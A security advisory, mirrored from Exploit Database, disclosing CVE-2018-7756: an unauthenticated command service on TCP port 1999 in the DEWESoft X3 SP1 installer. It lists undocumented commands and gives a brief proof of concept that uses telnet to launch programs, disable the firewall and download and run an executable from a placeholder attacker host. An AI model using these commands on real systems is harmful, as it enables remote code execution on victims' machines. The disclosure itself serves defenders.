DEWESoft X3 SP1 (x64) – Remote Command Execution

• Exploit Database
• 15 阅读

• 作者： hyp3rlinx
  日期： 2018-03-12
• 类别：

  • remote
  平台：

  • windows_x86-64
• 来源：https://www.exploit-db.com/exploits/44275/

• [+] Credits: John Page (aka hyp3rlinx)
  [+] Website: hyp3rlinx.altervista.org
  [+] Source:http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
  [+] ISR: Apparition Security
   
  
  
  Vendor:
  =============
  www.dewesoft.com
  
  
  Product:
  ===========
  DEWESoft X3 SP1 (64-bit) installer - X3
  DEWESoft_FULL_X3_SP1_64BIT.exe
  
  
  
  Vulnerability Type:
  ===================
  Remote Internal Command Access
  
  
  
  CVE Reference:
  ==============
  CVE-2018-7756
  
  
  
  Security Issue:
  ================
  The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
  for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
  RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run 
  a "SETFIREWALL Off" command. 
  
  The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
  
  Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
  
  RUN <ANY EXE>
  RUNEX <ANY EXE>
  GETFIREWALL
  SETFIREWALL Off
  KILL <PROCESS>
  USERNAME
  SHUTDOWN
  SENDKEYS
  LIST
  DWPIPE
  
  Exploit/POC:
  =============
  TELNET x.x.x.x 1999 
  RUN calc.exe
  
  OR
  
  Launch the victims browser and send them to website for a drive-by download etc.
  
  TELNET x.x.x.x 1999 
  RUN http://ATTACKER-IP/DOOM.exe
  
  Then from the TELNET session execute it from Downloads directory.
  
  runexe c:\Users\victim\Downloads\DOOM.exe
  
  
  Network Access:
  ===============
  Remote
  
  
  
  Severity:
  =========
  High
  
  
  
  Disclosure Timeline:
  =============================
  Vendor Notification: February 9, 2018
  Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
  Inform vendor of disclosure timeline : February 19, 2018
  No further replys, update or addressing of the issue by vendor.
  Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
  March 10, 2018 : Public Disclosure
  
  
  
  [+] Disclaimer
  The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
  Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
  that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
  is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
  for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
  or exploits by the author or elsewhere. All content (c).